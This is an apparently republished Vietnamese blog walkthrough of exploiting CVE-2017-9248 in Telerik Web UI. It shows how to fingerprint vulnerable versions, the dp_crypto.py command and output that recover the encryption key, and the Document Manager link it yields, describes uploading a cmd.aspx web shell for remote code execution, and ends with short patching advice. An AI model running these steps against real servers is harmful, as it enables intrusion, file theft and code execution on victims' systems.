Chào mọi người, mình xin chia sẻ bài viết phân tích về lỗ hổng trên Telerik Web UI, tuy cũ mà mới, cũ vì nó là CVE 2017-9248 , mới vì mình vô tình phát hiện rằng nó không có sẵn trong signature các thiết bị ANTT, và nó khá khó trong việc phát hiện tự động bởi nó thực hiện request một cách hợp lệ, vì vậy mình khuyến cáo các bạn tự kiểm tra thiết bị ANTT quản lý và cập nhật. Đây là lỗ hổng bảo mật cực kỳ nghiêm trọng, tồn tại do mã hóa yếu trong tệp tin Telerik.Web.UI.dll (Telerik UI for ASP.NET AJAX components). Khai thác lỗ hổng này hacker có thể giải mã ra key (Telerik.Web.UI.DialogParametersEncryptionKey and/or the MachineKey), từ đó có được đường link quản trị nội dung tệp tin và có thể tải tệp tin lên máy chủ nếu cấu hình cho phép (mặc định là cho phép). Lỗ hổng này tồn tại ở các phiên bản từ 2012.3.1308 đến 2017.1.118 (.NET 35, 40, 45).

Bạn đang xem: Telerik là gì

*


Cách xác định lỗ hổng:

*


Mở source web bằng cách Kích phải View page source hay Ctrl+U sau đó bấm Ctrl +F search với từ khóa “Telerik.Web.UI”

*


OK sau đó có thể lướt source ở 1 vài trang con khác để tìm phiên bản hiện tại

*


Bạn sẽ tìm ra với định dạng như hình bên trên OK, và bên dưới là danh sách các phiên bản có thể bị khai thác 2013.1.220 =>2017.2.503Time to Exploit

Xem thêm: Telex Là Gì – Telex Release Là Gì

*


Trước khi thực hiện exploit, các bạn xác định được tập tin “Dialog Handler” bằng cách request https://www.example.com/Telerik.Web.UI.DialogHandler.aspx, nếu kết quả bạn nhận lại được là chuỗi “Loading the dialog…” thì boom bạn đã đi đúng hướng.

*


Sugib3o~# python dp_crypto.py -k http://www.example.com/Telerik.Web.UI.DialogHandler.aspx 48 hex 9dp_crypto by Paul Taylor / Foregenix LtdCVE-2017-9248 – Telerik.Web.UI.dll Cryptographic compromiseAttacking http://www.example.com/Telerik.Web.UI.DialogHandler.aspxto find key of length with accuracy threshold using key charset Key position 01: {D} found with 31 requests, total so far: 31Key position 02: {3} found with 10 requests, total so far: 41Key position 03: {A} found with 35 requests, total so far: 76Key position 04: {D} found with 46 requests, total so far: 122Key position 45: {B} found with 50 requests, total so far: 1638Key position 46: {3} found with 36 requests, total so far: 1674Key position 47: {3} found with 50 requests, total so far: 1724Key position 48: {F} found with 57 requests, total so far: 1781Found key: D3ADB33FTotal web requests: 17812014.3.1024: http://www.example.com/Telerik.Web.UI.DialogHandler.aspx?DialogName=DocumentManager&renderMode=2&Skin=Default&Title=Document%20Manager&dpptn=&isRtl=false&dp=
Sau đó truy cập đến đường link “Document Manager” để truy cập được toàn bộ tập tin và thư mục của Server nạn nhân đồng thời có thể thực hiện upload tập tin lên Server này

*
*


Mình vừa upload 1 tập tin cmd.aspx

*

Tập tin đã lên máy chủ. Now it’s time to RCE

*

Thực hiện request và truyền 1 vài tham số từ bên ngoài

*

Xem thêm: Thất Bại Là Gì – định Nghĩa Lại Thất Bại

Tiến hành upgrade bản vá theo hướng dẫn tại đâyTạo các khóa duy nhất cho Telerick.Web.UI.DialogParameterEncodingKey và MachineKey trong web.config hoặc dùng trình tạo khóa của IIS machine KeyThực hiện Redirect url trả lại trang thông báo lỗi khi hacker truy cập Telerik

Chuyên mục: Hỏi Đáp